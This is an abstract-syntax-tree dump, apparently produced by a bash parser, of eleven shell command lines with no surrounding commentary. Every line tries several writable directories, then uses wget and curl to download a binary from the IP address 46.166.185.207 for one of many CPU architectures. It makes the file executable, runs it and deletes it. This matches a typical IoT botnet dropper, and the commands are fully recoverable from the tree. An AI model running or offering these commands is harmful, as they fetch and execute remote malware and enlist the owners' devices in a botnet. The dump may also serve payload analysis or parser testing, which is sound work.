ListNode(lineno=2, pos=(12, 195), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 103), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 103), word='http://46.166.185.207/fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(103, 104)),
  CommandNode(lineno=2, pos=(105, 144), parts=[
    WordNode(lineno=2, pos=(105, 109), word='curl'),
    WordNode(lineno=2, pos=(110, 112), word='-O'),
    WordNode(lineno=2, pos=(113, 144), word='http://46.166.185.207/fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(144, 145)),
  CommandNode(lineno=2, pos=(146, 164), parts=[
    WordNode(lineno=2, pos=(146, 151), word='chmod'),
    WordNode(lineno=2, pos=(152, 154), word='+x'),
    WordNode(lineno=2, pos=(155, 164), word='fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(164, 165)),
  CommandNode(lineno=2, pos=(166, 177), parts=[
    WordNode(lineno=2, pos=(166, 177), word='./fyfa.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(177, 178)),
  CommandNode(lineno=2, pos=(179, 195), parts=[
    WordNode(lineno=2, pos=(179, 181), word='rm'),
    WordNode(lineno=2, pos=(182, 185), word='-rf'),
    WordNode(lineno=2, pos=(186, 195), word='fyfa.mips'),
  ]),
])
ListNode(lineno=3, pos=(196, 379), parts=[
  CommandNode(lineno=3, pos=(196, 203), parts=[
    WordNode(lineno=3, pos=(196, 198), word='cd'),
    WordNode(lineno=3, pos=(199, 203), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(204, 206)),
  CommandNode(lineno=3, pos=(207, 218), parts=[
    WordNode(lineno=3, pos=(207, 209), word='cd'),
    WordNode(lineno=3, pos=(210, 218), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(219, 221)),
  CommandNode(lineno=3, pos=(222, 229), parts=[
    WordNode(lineno=3, pos=(222, 224), word='cd'),
    WordNode(lineno=3, pos=(225, 229), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(230, 232)),
  CommandNode(lineno=3, pos=(233, 241), parts=[
    WordNode(lineno=3, pos=(233, 235), word='cd'),
    WordNode(lineno=3, pos=(236, 241), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(242, 244)),
  CommandNode(lineno=3, pos=(245, 249), parts=[
    WordNode(lineno=3, pos=(245, 247), word='cd'),
    WordNode(lineno=3, pos=(248, 249), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 287), parts=[
    WordNode(lineno=3, pos=(251, 255), word='wget'),
    WordNode(lineno=3, pos=(256, 287), word='http://46.166.185.207/fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(287, 288)),
  CommandNode(lineno=3, pos=(289, 328), parts=[
    WordNode(lineno=3, pos=(289, 293), word='curl'),
    WordNode(lineno=3, pos=(294, 296), word='-O'),
    WordNode(lineno=3, pos=(297, 328), word='http://46.166.185.207/fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(328, 329)),
  CommandNode(lineno=3, pos=(330, 348), parts=[
    WordNode(lineno=3, pos=(330, 335), word='chmod'),
    WordNode(lineno=3, pos=(336, 338), word='+x'),
    WordNode(lineno=3, pos=(339, 348), word='fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(348, 349)),
  CommandNode(lineno=3, pos=(350, 361), parts=[
    WordNode(lineno=3, pos=(350, 361), word='./fyfa.mpsl'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(361, 362)),
  CommandNode(lineno=3, pos=(363, 379), parts=[
    WordNode(lineno=3, pos=(363, 365), word='rm'),
    WordNode(lineno=3, pos=(366, 369), word='-rf'),
    WordNode(lineno=3, pos=(370, 379), word='fyfa.mpsl'),
  ]),
])
ListNode(lineno=4, pos=(380, 558), parts=[
  CommandNode(lineno=4, pos=(380, 387), parts=[
    WordNode(lineno=4, pos=(380, 382), word='cd'),
    WordNode(lineno=4, pos=(383, 387), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(388, 390)),
  CommandNode(lineno=4, pos=(391, 402), parts=[
    WordNode(lineno=4, pos=(391, 393), word='cd'),
    WordNode(lineno=4, pos=(394, 402), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(403, 405)),
  CommandNode(lineno=4, pos=(406, 413), parts=[
    WordNode(lineno=4, pos=(406, 408), word='cd'),
    WordNode(lineno=4, pos=(409, 413), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(414, 416)),
  CommandNode(lineno=4, pos=(417, 425), parts=[
    WordNode(lineno=4, pos=(417, 419), word='cd'),
    WordNode(lineno=4, pos=(420, 425), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(426, 428)),
  CommandNode(lineno=4, pos=(429, 433), parts=[
    WordNode(lineno=4, pos=(429, 431), word='cd'),
    WordNode(lineno=4, pos=(432, 433), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(433, 434)),
  CommandNode(lineno=4, pos=(435, 470), parts=[
    WordNode(lineno=4, pos=(435, 439), word='wget'),
    WordNode(lineno=4, pos=(440, 470), word='http://46.166.185.207/fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(470, 471)),
  CommandNode(lineno=4, pos=(472, 510), parts=[
    WordNode(lineno=4, pos=(472, 476), word='curl'),
    WordNode(lineno=4, pos=(477, 479), word='-O'),
    WordNode(lineno=4, pos=(480, 510), word='http://46.166.185.207/fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(510, 511)),
  CommandNode(lineno=4, pos=(512, 529), parts=[
    WordNode(lineno=4, pos=(512, 517), word='chmod'),
    WordNode(lineno=4, pos=(518, 520), word='+x'),
    WordNode(lineno=4, pos=(521, 529), word='fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(529, 530)),
  CommandNode(lineno=4, pos=(531, 541), parts=[
    WordNode(lineno=4, pos=(531, 541), word='./fyfa.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(541, 542)),
  CommandNode(lineno=4, pos=(543, 558), parts=[
    WordNode(lineno=4, pos=(543, 545), word='rm'),
    WordNode(lineno=4, pos=(546, 549), word='-rf'),
    WordNode(lineno=4, pos=(550, 558), word='fyfa.sh4'),
  ]),
])
ListNode(lineno=5, pos=(559, 737), parts=[
  CommandNode(lineno=5, pos=(559, 566), parts=[
    WordNode(lineno=5, pos=(559, 561), word='cd'),
    WordNode(lineno=5, pos=(562, 566), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(567, 569)),
  CommandNode(lineno=5, pos=(570, 581), parts=[
    WordNode(lineno=5, pos=(570, 572), word='cd'),
    WordNode(lineno=5, pos=(573, 581), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(582, 584)),
  CommandNode(lineno=5, pos=(585, 592), parts=[
    WordNode(lineno=5, pos=(585, 587), word='cd'),
    WordNode(lineno=5, pos=(588, 592), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(593, 595)),
  CommandNode(lineno=5, pos=(596, 604), parts=[
    WordNode(lineno=5, pos=(596, 598), word='cd'),
    WordNode(lineno=5, pos=(599, 604), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(605, 607)),
  CommandNode(lineno=5, pos=(608, 612), parts=[
    WordNode(lineno=5, pos=(608, 610), word='cd'),
    WordNode(lineno=5, pos=(611, 612), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(612, 613)),
  CommandNode(lineno=5, pos=(614, 649), parts=[
    WordNode(lineno=5, pos=(614, 618), word='wget'),
    WordNode(lineno=5, pos=(619, 649), word='http://46.166.185.207/fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(649, 650)),
  CommandNode(lineno=5, pos=(651, 689), parts=[
    WordNode(lineno=5, pos=(651, 655), word='curl'),
    WordNode(lineno=5, pos=(656, 658), word='-O'),
    WordNode(lineno=5, pos=(659, 689), word='http://46.166.185.207/fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(689, 690)),
  CommandNode(lineno=5, pos=(691, 708), parts=[
    WordNode(lineno=5, pos=(691, 696), word='chmod'),
    WordNode(lineno=5, pos=(697, 699), word='+x'),
    WordNode(lineno=5, pos=(700, 708), word='fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(708, 709)),
  CommandNode(lineno=5, pos=(710, 720), parts=[
    WordNode(lineno=5, pos=(710, 720), word='./fyfa.x86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(720, 721)),
  CommandNode(lineno=5, pos=(722, 737), parts=[
    WordNode(lineno=5, pos=(722, 724), word='rm'),
    WordNode(lineno=5, pos=(725, 728), word='-rf'),
    WordNode(lineno=5, pos=(729, 737), word='fyfa.x86'),
  ]),
])
ListNode(lineno=6, pos=(738, 916), parts=[
  CommandNode(lineno=6, pos=(738, 745), parts=[
    WordNode(lineno=6, pos=(738, 740), word='cd'),
    WordNode(lineno=6, pos=(741, 745), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(746, 748)),
  CommandNode(lineno=6, pos=(749, 760), parts=[
    WordNode(lineno=6, pos=(749, 751), word='cd'),
    WordNode(lineno=6, pos=(752, 760), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(761, 763)),
  CommandNode(lineno=6, pos=(764, 771), parts=[
    WordNode(lineno=6, pos=(764, 766), word='cd'),
    WordNode(lineno=6, pos=(767, 771), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(772, 774)),
  CommandNode(lineno=6, pos=(775, 783), parts=[
    WordNode(lineno=6, pos=(775, 777), word='cd'),
    WordNode(lineno=6, pos=(778, 783), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(784, 786)),
  CommandNode(lineno=6, pos=(787, 791), parts=[
    WordNode(lineno=6, pos=(787, 789), word='cd'),
    WordNode(lineno=6, pos=(790, 791), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(791, 792)),
  CommandNode(lineno=6, pos=(793, 828), parts=[
    WordNode(lineno=6, pos=(793, 797), word='wget'),
    WordNode(lineno=6, pos=(798, 828), word='http://46.166.185.207/fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(828, 829)),
  CommandNode(lineno=6, pos=(830, 868), parts=[
    WordNode(lineno=6, pos=(830, 834), word='curl'),
    WordNode(lineno=6, pos=(835, 837), word='-O'),
    WordNode(lineno=6, pos=(838, 868), word='http://46.166.185.207/fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(868, 869)),
  CommandNode(lineno=6, pos=(870, 887), parts=[
    WordNode(lineno=6, pos=(870, 875), word='chmod'),
    WordNode(lineno=6, pos=(876, 878), word='+x'),
    WordNode(lineno=6, pos=(879, 887), word='fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(887, 888)),
  CommandNode(lineno=6, pos=(889, 899), parts=[
    WordNode(lineno=6, pos=(889, 899), word='./fyfa.arm'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(899, 900)),
  CommandNode(lineno=6, pos=(901, 916), parts=[
    WordNode(lineno=6, pos=(901, 903), word='rm'),
    WordNode(lineno=6, pos=(904, 907), word='-rf'),
    WordNode(lineno=6, pos=(908, 916), word='fyfa.arm'),
  ]),
])
ListNode(lineno=7, pos=(917, 1095), parts=[
  CommandNode(lineno=7, pos=(917, 924), parts=[
    WordNode(lineno=7, pos=(917, 919), word='cd'),
    WordNode(lineno=7, pos=(920, 924), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(925, 927)),
  CommandNode(lineno=7, pos=(928, 939), parts=[
    WordNode(lineno=7, pos=(928, 930), word='cd'),
    WordNode(lineno=7, pos=(931, 939), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(940, 942)),
  CommandNode(lineno=7, pos=(943, 950), parts=[
    WordNode(lineno=7, pos=(943, 945), word='cd'),
    WordNode(lineno=7, pos=(946, 950), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(951, 953)),
  CommandNode(lineno=7, pos=(954, 962), parts=[
    WordNode(lineno=7, pos=(954, 956), word='cd'),
    WordNode(lineno=7, pos=(957, 962), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(963, 965)),
  CommandNode(lineno=7, pos=(966, 970), parts=[
    WordNode(lineno=7, pos=(966, 968), word='cd'),
    WordNode(lineno=7, pos=(969, 970), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(970, 971)),
  CommandNode(lineno=7, pos=(972, 1007), parts=[
    WordNode(lineno=7, pos=(972, 976), word='wget'),
    WordNode(lineno=7, pos=(977, 1007), word='http://46.166.185.207/fyfa.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1007, 1008)),
  CommandNode(lineno=7, pos=(1009, 1047), parts=[
    WordNode(lineno=7, pos=(1009, 1013), word='curl'),
    WordNode(lineno=7, pos=(1014, 1016), word='-O'),
    WordNode(lineno=7, pos=(1017, 1047), word='http://46.166.185.207/fyfa.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1047, 1048)),
  CommandNode(lineno=7, pos=(1049, 1066), parts=[
    WordNode(lineno=7, pos=(1049, 1054), word='chmod'),
    WordNode(lineno=7, pos=(1055, 1057), word='+x'),
    WordNode(lineno=7, pos=(1058, 1066), word='fyfa.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1066, 1067)),
  CommandNode(lineno=7, pos=(1068, 1078), parts=[
    WordNode(lineno=7, pos=(1068, 1078), word='./fyfa.pcc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1078, 1079)),
  CommandNode(lineno=7, pos=(1080, 1095), parts=[
    WordNode(lineno=7, pos=(1080, 1082), word='rm'),
    WordNode(lineno=7, pos=(1083, 1086), word='-rf'),
    WordNode(lineno=7, pos=(1087, 1095), word='fyfa.pcc'),
  ]),
])
ListNode(lineno=8, pos=(1096, 1279), parts=[
  CommandNode(lineno=8, pos=(1096, 1103), parts=[
    WordNode(lineno=8, pos=(1096, 1098), word='cd'),
    WordNode(lineno=8, pos=(1099, 1103), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1104, 1106)),
  CommandNode(lineno=8, pos=(1107, 1118), parts=[
    WordNode(lineno=8, pos=(1107, 1109), word='cd'),
    WordNode(lineno=8, pos=(1110, 1118), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1119, 1121)),
  CommandNode(lineno=8, pos=(1122, 1129), parts=[
    WordNode(lineno=8, pos=(1122, 1124), word='cd'),
    WordNode(lineno=8, pos=(1125, 1129), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1130, 1132)),
  CommandNode(lineno=8, pos=(1133, 1141), parts=[
    WordNode(lineno=8, pos=(1133, 1135), word='cd'),
    WordNode(lineno=8, pos=(1136, 1141), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1142, 1144)),
  CommandNode(lineno=8, pos=(1145, 1149), parts=[
    WordNode(lineno=8, pos=(1145, 1147), word='cd'),
    WordNode(lineno=8, pos=(1148, 1149), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1149, 1150)),
  CommandNode(lineno=8, pos=(1151, 1187), parts=[
    WordNode(lineno=8, pos=(1151, 1155), word='wget'),
    WordNode(lineno=8, pos=(1156, 1187), word='http://46.166.185.207/fyfa.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1187, 1188)),
  CommandNode(lineno=8, pos=(1189, 1228), parts=[
    WordNode(lineno=8, pos=(1189, 1193), word='curl'),
    WordNode(lineno=8, pos=(1194, 1196), word='-O'),
    WordNode(lineno=8, pos=(1197, 1228), word='http://46.166.185.207/fyfa.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1228, 1229)),
  CommandNode(lineno=8, pos=(1230, 1248), parts=[
    WordNode(lineno=8, pos=(1230, 1235), word='chmod'),
    WordNode(lineno=8, pos=(1236, 1238), word='+x'),
    WordNode(lineno=8, pos=(1239, 1248), word='fyfa.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1248, 1249)),
  CommandNode(lineno=8, pos=(1250, 1261), parts=[
    WordNode(lineno=8, pos=(1250, 1261), word='./fyfa.i686'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1261, 1262)),
  CommandNode(lineno=8, pos=(1263, 1279), parts=[
    WordNode(lineno=8, pos=(1263, 1265), word='rm'),
    WordNode(lineno=8, pos=(1266, 1269), word='-rf'),
    WordNode(lineno=8, pos=(1270, 1279), word='fyfa.i686'),
  ]),
])
ListNode(lineno=9, pos=(1280, 1463), parts=[
  CommandNode(lineno=9, pos=(1280, 1287), parts=[
    WordNode(lineno=9, pos=(1280, 1282), word='cd'),
    WordNode(lineno=9, pos=(1283, 1287), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1288, 1290)),
  CommandNode(lineno=9, pos=(1291, 1302), parts=[
    WordNode(lineno=9, pos=(1291, 1293), word='cd'),
    WordNode(lineno=9, pos=(1294, 1302), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1303, 1305)),
  CommandNode(lineno=9, pos=(1306, 1313), parts=[
    WordNode(lineno=9, pos=(1306, 1308), word='cd'),
    WordNode(lineno=9, pos=(1309, 1313), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1314, 1316)),
  CommandNode(lineno=9, pos=(1317, 1325), parts=[
    WordNode(lineno=9, pos=(1317, 1319), word='cd'),
    WordNode(lineno=9, pos=(1320, 1325), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1326, 1328)),
  CommandNode(lineno=9, pos=(1329, 1333), parts=[
    WordNode(lineno=9, pos=(1329, 1331), word='cd'),
    WordNode(lineno=9, pos=(1332, 1333), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1333, 1334)),
  CommandNode(lineno=9, pos=(1335, 1371), parts=[
    WordNode(lineno=9, pos=(1335, 1339), word='wget'),
    WordNode(lineno=9, pos=(1340, 1371), word='http://46.166.185.207/fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1371, 1372)),
  CommandNode(lineno=9, pos=(1373, 1412), parts=[
    WordNode(lineno=9, pos=(1373, 1377), word='curl'),
    WordNode(lineno=9, pos=(1378, 1380), word='-O'),
    WordNode(lineno=9, pos=(1381, 1412), word='http://46.166.185.207/fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1412, 1413)),
  CommandNode(lineno=9, pos=(1414, 1432), parts=[
    WordNode(lineno=9, pos=(1414, 1419), word='chmod'),
    WordNode(lineno=9, pos=(1420, 1422), word='+x'),
    WordNode(lineno=9, pos=(1423, 1432), word='fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1432, 1433)),
  CommandNode(lineno=9, pos=(1434, 1445), parts=[
    WordNode(lineno=9, pos=(1434, 1445), word='./fyfa.i586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1445, 1446)),
  CommandNode(lineno=9, pos=(1447, 1463), parts=[
    WordNode(lineno=9, pos=(1447, 1449), word='rm'),
    WordNode(lineno=9, pos=(1450, 1453), word='-rf'),
    WordNode(lineno=9, pos=(1454, 1463), word='fyfa.i586'),
  ]),
])
ListNode(lineno=10, pos=(1464, 1647), parts=[
  CommandNode(lineno=10, pos=(1464, 1471), parts=[
    WordNode(lineno=10, pos=(1464, 1466), word='cd'),
    WordNode(lineno=10, pos=(1467, 1471), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1472, 1474)),
  CommandNode(lineno=10, pos=(1475, 1486), parts=[
    WordNode(lineno=10, pos=(1475, 1477), word='cd'),
    WordNode(lineno=10, pos=(1478, 1486), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1487, 1489)),
  CommandNode(lineno=10, pos=(1490, 1497), parts=[
    WordNode(lineno=10, pos=(1490, 1492), word='cd'),
    WordNode(lineno=10, pos=(1493, 1497), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1498, 1500)),
  CommandNode(lineno=10, pos=(1501, 1509), parts=[
    WordNode(lineno=10, pos=(1501, 1503), word='cd'),
    WordNode(lineno=10, pos=(1504, 1509), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1510, 1512)),
  CommandNode(lineno=10, pos=(1513, 1517), parts=[
    WordNode(lineno=10, pos=(1513, 1515), word='cd'),
    WordNode(lineno=10, pos=(1516, 1517), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1517, 1518)),
  CommandNode(lineno=10, pos=(1519, 1555), parts=[
    WordNode(lineno=10, pos=(1519, 1523), word='wget'),
    WordNode(lineno=10, pos=(1524, 1555), word='http://46.166.185.207/fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1555, 1556)),
  CommandNode(lineno=10, pos=(1557, 1596), parts=[
    WordNode(lineno=10, pos=(1557, 1561), word='curl'),
    WordNode(lineno=10, pos=(1562, 1564), word='-O'),
    WordNode(lineno=10, pos=(1565, 1596), word='http://46.166.185.207/fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1596, 1597)),
  CommandNode(lineno=10, pos=(1598, 1616), parts=[
    WordNode(lineno=10, pos=(1598, 1603), word='chmod'),
    WordNode(lineno=10, pos=(1604, 1606), word='+x'),
    WordNode(lineno=10, pos=(1607, 1616), word='fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1616, 1617)),
  CommandNode(lineno=10, pos=(1618, 1629), parts=[
    WordNode(lineno=10, pos=(1618, 1629), word='./fyfa.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1629, 1630)),
  CommandNode(lineno=10, pos=(1631, 1647), parts=[
    WordNode(lineno=10, pos=(1631, 1633), word='rm'),
    WordNode(lineno=10, pos=(1634, 1637), word='-rf'),
    WordNode(lineno=10, pos=(1638, 1647), word='fyfa.m68k'),
  ]),
])
ListNode(lineno=11, pos=(1648, 1826), parts=[
  CommandNode(lineno=11, pos=(1648, 1655), parts=[
    WordNode(lineno=11, pos=(1648, 1650), word='cd'),
    WordNode(lineno=11, pos=(1651, 1655), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1656, 1658)),
  CommandNode(lineno=11, pos=(1659, 1670), parts=[
    WordNode(lineno=11, pos=(1659, 1661), word='cd'),
    WordNode(lineno=11, pos=(1662, 1670), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1671, 1673)),
  CommandNode(lineno=11, pos=(1674, 1681), parts=[
    WordNode(lineno=11, pos=(1674, 1676), word='cd'),
    WordNode(lineno=11, pos=(1677, 1681), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1682, 1684)),
  CommandNode(lineno=11, pos=(1685, 1693), parts=[
    WordNode(lineno=11, pos=(1685, 1687), word='cd'),
    WordNode(lineno=11, pos=(1688, 1693), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1694, 1696)),
  CommandNode(lineno=11, pos=(1697, 1701), parts=[
    WordNode(lineno=11, pos=(1697, 1699), word='cd'),
    WordNode(lineno=11, pos=(1700, 1701), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1701, 1702)),
  CommandNode(lineno=11, pos=(1703, 1738), parts=[
    WordNode(lineno=11, pos=(1703, 1707), word='wget'),
    WordNode(lineno=11, pos=(1708, 1738), word='http://46.166.185.207/fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1738, 1739)),
  CommandNode(lineno=11, pos=(1740, 1778), parts=[
    WordNode(lineno=11, pos=(1740, 1744), word='curl'),
    WordNode(lineno=11, pos=(1745, 1747), word='-O'),
    WordNode(lineno=11, pos=(1748, 1778), word='http://46.166.185.207/fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1778, 1779)),
  CommandNode(lineno=11, pos=(1780, 1797), parts=[
    WordNode(lineno=11, pos=(1780, 1785), word='chmod'),
    WordNode(lineno=11, pos=(1786, 1788), word='+x'),
    WordNode(lineno=11, pos=(1789, 1797), word='fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1797, 1798)),
  CommandNode(lineno=11, pos=(1799, 1809), parts=[
    WordNode(lineno=11, pos=(1799, 1809), word='./fyfa.spc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1809, 1810)),
  CommandNode(lineno=11, pos=(1811, 1826), parts=[
    WordNode(lineno=11, pos=(1811, 1813), word='rm'),
    WordNode(lineno=11, pos=(1814, 1817), word='-rf'),
    WordNode(lineno=11, pos=(1818, 1826), word='fyfa.spc'),
  ]),
])
ListNode(lineno=12, pos=(1827, 2005), parts=[
  CommandNode(lineno=12, pos=(1827, 1834), parts=[
    WordNode(lineno=12, pos=(1827, 1829), word='cd'),
    WordNode(lineno=12, pos=(1830, 1834), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1835, 1837)),
  CommandNode(lineno=12, pos=(1838, 1849), parts=[
    WordNode(lineno=12, pos=(1838, 1840), word='cd'),
    WordNode(lineno=12, pos=(1841, 1849), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1850, 1852)),
  CommandNode(lineno=12, pos=(1853, 1860), parts=[
    WordNode(lineno=12, pos=(1853, 1855), word='cd'),
    WordNode(lineno=12, pos=(1856, 1860), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1861, 1863)),
  CommandNode(lineno=12, pos=(1864, 1872), parts=[
    WordNode(lineno=12, pos=(1864, 1866), word='cd'),
    WordNode(lineno=12, pos=(1867, 1872), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1873, 1875)),
  CommandNode(lineno=12, pos=(1876, 1880), parts=[
    WordNode(lineno=12, pos=(1876, 1878), word='cd'),
    WordNode(lineno=12, pos=(1879, 1880), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1880, 1881)),
  CommandNode(lineno=12, pos=(1882, 1917), parts=[
    WordNode(lineno=12, pos=(1882, 1886), word='wget'),
    WordNode(lineno=12, pos=(1887, 1917), word='http://46.166.185.207/fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1917, 1918)),
  CommandNode(lineno=12, pos=(1919, 1957), parts=[
    WordNode(lineno=12, pos=(1919, 1923), word='curl'),
    WordNode(lineno=12, pos=(1924, 1926), word='-O'),
    WordNode(lineno=12, pos=(1927, 1957), word='http://46.166.185.207/fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1957, 1958)),
  CommandNode(lineno=12, pos=(1959, 1976), parts=[
    WordNode(lineno=12, pos=(1959, 1964), word='chmod'),
    WordNode(lineno=12, pos=(1965, 1967), word='+x'),
    WordNode(lineno=12, pos=(1968, 1976), word='fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1976, 1977)),
  CommandNode(lineno=12, pos=(1978, 1988), parts=[
    WordNode(lineno=12, pos=(1978, 1988), word='./fyfa.pcc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1988, 1989)),
  CommandNode(lineno=12, pos=(1990, 2005), parts=[
    WordNode(lineno=12, pos=(1990, 1992), word='rm'),
    WordNode(lineno=12, pos=(1993, 1996), word='-rf'),
    WordNode(lineno=12, pos=(1997, 2005), word='fyfa.pcc'),
  ]),
])
